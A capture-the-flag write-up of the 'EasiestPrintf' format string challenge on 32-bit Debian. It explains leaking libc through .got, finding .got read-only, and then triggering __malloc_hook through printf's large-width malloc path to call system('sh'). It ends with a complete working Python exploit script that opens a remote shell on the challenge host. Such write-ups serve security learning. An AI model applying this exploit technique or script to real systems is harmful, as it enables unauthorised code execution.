The task, as the name implies, was a rather basic (at first glance - there was a plot twist) format string bug in a short 32-bit Debian application. The initial description of the task was:
---
Warm UP! A traditional Format String Attack.
202.120.7.210 12321
http://dl.0ops.net/EasiestPrintf
---
And it later was upgraded (without me noticing đ; though in all fairness it didn't change much) to:
---
Warm UP! A traditional Format String Attack.
It's running on Debian 8.
nc 202.120.7.210 12321
http://dl.0ops.net/EasiestPrintf
http://dl.0ops.net/libc.so.6_0ed9bad239c74870ed2db31c735132ce
---
The code itself was rather simple and boiled down to the following steps:
- Turn off buffering for stdin/stdout/stderr and setup alarm for one minute (a rather usual thing in CTF tasks).
- Manually randomize the stack address by doing a 16-byte aligned alloca().
- Get one decimal number (address) from the user and print in hexadecimal a 32-bit word from that address (an explicit leak).
- Read up to 159 bytes into a buffer on the stack (or up until \n was encountered, whichever came first) and do a printf(buffer) on it.
- Call exit(0) immediately after printf.
The manual ASLR from the second point could actually be ignored (at least I didn't find it annoying in any way) and the explicit leak from third point had to be used to leak the address of libc (or, to be more accurate, leak one of the addresses of resolved functions from .got and calculate the address of libc based on that).
While a link to libc was added later to the task description, I didn't notice until after I already solved the challenge, so I had to use the usual method of leaking 2-3 addresses from .got (in my case these were read, close and alarm) and look up the libc in our database of libcs (a good thing toi have). This resulted in finding exactly one library that matched all three addresses (or rather all three 12-bit lowest parts of the addresses) and giving me exactly one libc. And exactly zero ld-linux.so.2, which meant I couldn't debug the application locally, but I didn't care that much either (if possible I prefer to solve the tasks straight on the challenge server - way less problems with differences in the environment).
After having the libc the rest I had to do was create a format string which would overwrite .got exit entry with the address of a ROP gadget that would pivot the stack to my buffer and thus launch a ROP chain that runs system("/bin/sh"). Done, right?
Wrong.
It turned out that .got was read-only.
This started a 3 hour long journey to find a way to overwrite something that will give me control over EIP. The fact that immediately after printf() returned exit() was called didn't make things easier. The things I tried on the way:
- Destructor tables in main binary and libc - nope, read only.
- The atexit list - nope, pointer encrypted, don't know the secret value.
- stdout's function vector table - nope, read only (one thing I didn't try was to change the address of the vector table itself).
- A few function pointers that might be called on exit in libc - nope, read only.
- The return address of printf itself - nope, no idea where the stack is.
Finally I recalled that libc has memory allocation hooks (__malloc_hook, __free_hook, etc) which are pointers to functions that are called when malloc or free are invoked. Luckily these pointers were not encrypted (i.e. due to the nature of how these are used/set up by the programmer - global function pointers that are to be overwritten - they cannot be encrypted).
However, does printf really use malloc?
At first I though about the $ positional markers - when the glibc's printf implementation encounters them, it create a copy of the argument from the stack (it needs a lookup table, and the usual vararg accessing methods don't provide such option). But it turned out it uses alloca() (i.e. on stack allocation) to do it (snippet from glibc-2.19/stdio-common/vfprintf.c):
/* Here starts the more complex loop to handle positional parameters. */
do_positional:
...
/* Array with information about the needed arguments. This has to
be dynamically extensible. */
size_t nspecs = 0;
/* A more or less arbitrary start value. */
size_t nspecs_size = 32 * sizeof (struct printf_spec);
struct printf_spec *specs = alloca (nspecs_size);
But since I was already looking at printf's internals, I just grepped for "malloc" and "free" finding a couple of places where they are indeed called. The most promising one was related to the width specifier (you know, e.g. "%1234x" - 1234 is the width of the field) of any format field:
if (width >= sizeof (work_buffer) / sizeof (work_buffer[0]) - 32)
{
/* We have to use a special buffer. The "32" is just a safe
bet for all the output which is not counted in the width. */
size_t needed = ((size_t) width + 32) * sizeof (CHAR_T);
if (__libc_use_alloca (needed))
workend = (CHAR_T *) alloca (needed) + width + 32;
else
{
workstart = (CHAR_T *) malloc (needed);
After both doing some experiments (looking when malloc is called and when it's not) and looking up this code within the libc binary, I found out that any width above 65535 - 32 actually causes a malloc (and then eventually a free) to be called. And that both the __malloc_hook and __free_hook are really called giving me EIP control.
Initially I wanted to overwrite the __free_hook with a gadget that would pivot the stack to my buffer to launch a ROP chain, but it turned out it's rather hard to do that (or at least my experiments failed; might be that it was 4am though).
So in the end I resorted to using a method abusing the fact that __malloc_hook was actually called with the width (+32) as an argument, so I ended up doing the following:
- I've put "sh\0\0" in main binary's .data section.
- Then overwritten __malloc_hook with the address of system.
- And triggered the whole thing by using a "%WIDTHs" tag, where WIDTH was the address of said "sh\0\0" minus 32.
A small problem was that the address of the third byte of __malloc_hook contained the \n character, which broke my write-byte-by-byte method (i.e. "%hhn"), but it was enough to switch to a write-a-word method for that specific place (so the upper byte of the word overwrites the problematic byte).
And to my surprise, it worked with the first try (full exploit is at the end of the post):
gynvael:haven-windows> pwnbase.py
libc @ 0xf75de000L
224 196 0xe0L
195 24803 0x61c3L
247 52 0x61f7L
224 124 0x6273
195 245 0x6368
97 152 0x6400
247 256 0x6500
120
Shell opened!
cat /home/EasiestPrintf/flag
flag{Dr4m471c_pr1N7f_45_y0u_Kn0w}
And that's it! I really liked this task especially due to the plot twist with r-x .got - it forced me to dig a little deeper then usually in the printf internals, which was pretty fun in the end.
P.S. Exploit (Python 2.7):
#!/usr/bin/python
import sys
import socket
import telnetlib
import os
import time
from struct import pack, unpack
def recvuntil(sock, txt):
d = ""
while d.find(txt) == -1:
try:
dnow = sock.recv(1)
if len(dnow) == 0:
print "-=(warning)=- recvuntil() failed at recv"
print "Last received data:"
print d
return False
except socket.error as msg:
print "-=(warning)=- recvuntil() failed:", msg
print "Last received data:"
print d
return False
d += dnow
return d
def recvall(sock, n):
d = ""
while len(d) != n:
try:
dnow = sock.recv(n - len(d))
if len(dnow) == 0:
print "-=(warning)=- recvuntil() failed at recv"
print "Last received data:"
print d
return False
except socket.error as msg:
print "-=(warning)=- recvuntil() failed:", msg
print "Last received data:"
print d
return False
d += dnow
return d
# Proxy object for sockets.
class gsocket(object):
def __init__(self, *p):
self._sock = socket.socket(*p)
def __getattr__(self, name):
return getattr(self._sock, name)
def recvall(self, n):
return recvall(self._sock, n)
def recvuntil(self, txt):
return recvuntil(self._sock, txt)
# Base for any of my ROPs.
def db(v):
return pack("<B", v)
def dw(v):
return pack("<H", v)
def dd(v):
return pack("<I", v)
def dq(v):
return pack("<Q", v)
def rb(v):
return unpack("<B", v[0])[0]
def rw(v):
return unpack("<H", v[:2])[0]
def rd(v):
return unpack("<I", v[:4])[0]
def rq(v):
return unpack("<Q", v[:8])[0]
def go():
global HOST
global PORT
s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# Put your code here!
M1 = "Which address you wanna read:\n"
s.recvuntil(M1)
addr = 0x08049FD4 # alarm in .got
s.sendall("%u\n" % addr)
LIBC = int(s.recvuntil("\n").strip(), 16)
LIBC -= 0xB6C70
print "libc @ ", hex(LIBC)
SYSTEM = LIBC + 0x3E3E0
EBFE = LIBC + 0x24119 # Good for debugging.
PUTS = 0x80485C0
WHAT = SYSTEM
WHERE = LIBC + 0x1A9408
WHERE2 = 0x804A04C # A writable address in .data.
WHAT2 = rd("sh\0\0")
fmt = ""
fmt += dd(WHERE) + dd(WHERE+1) + dd(WHERE+3)
fmt += dd(WHERE2) + dd(WHERE2+1) + dd(WHERE2+2) + dd(WHERE2+3)
cnt = len(fmt)
def getoffset(b, c):
while c >= b:
b += 256
return b - c, b
# First write (__malloc_hook with system).
diff, cnt = getoffset(WHAT & 0xff, cnt)
print WHAT & 0xff, diff, hex(cnt)
fmt += "%" + str(diff) + "c" + "%7$hhn"
diff, cnt = getoffset((WHAT >> 8) & 0xffff, cnt)
print (WHAT >> 8) & 0xff, diff, hex(cnt)
fmt += "%" + str(diff) + "c" + "%8$hn"
diff, cnt = getoffset((WHAT >> 24) & 0xff, cnt)
print (WHAT >> 24) & 0xff, diff, hex(cnt)
fmt += "%" + str(diff) + "c" + "%9$hhn"
# Second write (.data address with "sh\0\0".
diff, cnt = getoffset(WHAT2 & 0xff, cnt)
print WHAT & 0xff, diff, hex(cnt)
fmt += "%" + str(diff) + "c" + "%10$hhn"
diff, cnt = getoffset((WHAT2 >> 8) & 0xff, cnt)
print (WHAT >> 8) & 0xff, diff, hex(cnt)
fmt += "%" + str(diff) + "c" + "%11$hhn"
diff, cnt = getoffset((WHAT2 >> 16) & 0xff, cnt)
print (WHAT >> 16) & 0xff, diff, hex(cnt)
fmt += "%" + str(diff) + "c" + "%12$hhn"
diff, cnt = getoffset((WHAT2 >> 24) & 0xff, cnt)
print (WHAT >> 24) & 0xff, diff, hex(cnt)
fmt += "%" + str(diff) + "c" + "%13$hhn"
# Trigger the malloc, use addr of "sh\0\0" as width.
fmt += "%" + str(WHERE2 - 32) + "s"
# Padding to 4. Probably not needed.
while (len(fmt) % 4) != 0:
fmt += "|"
print len(fmt)
if '\n' in fmt:
print "OOOOOOOOOPSSSSSS \\n in payload lol"
s.sendall(fmt + "\n")
s.sendall("echo -- it worked --\n")
s.recvuntil("-- it worked --\n")
print "Shell opened!"
# Interactive sockets.
t = telnetlib.Telnet()
t.sock = s
t.interact()
s.close()
HOST = '202.120.7.210'
PORT = 12321
go()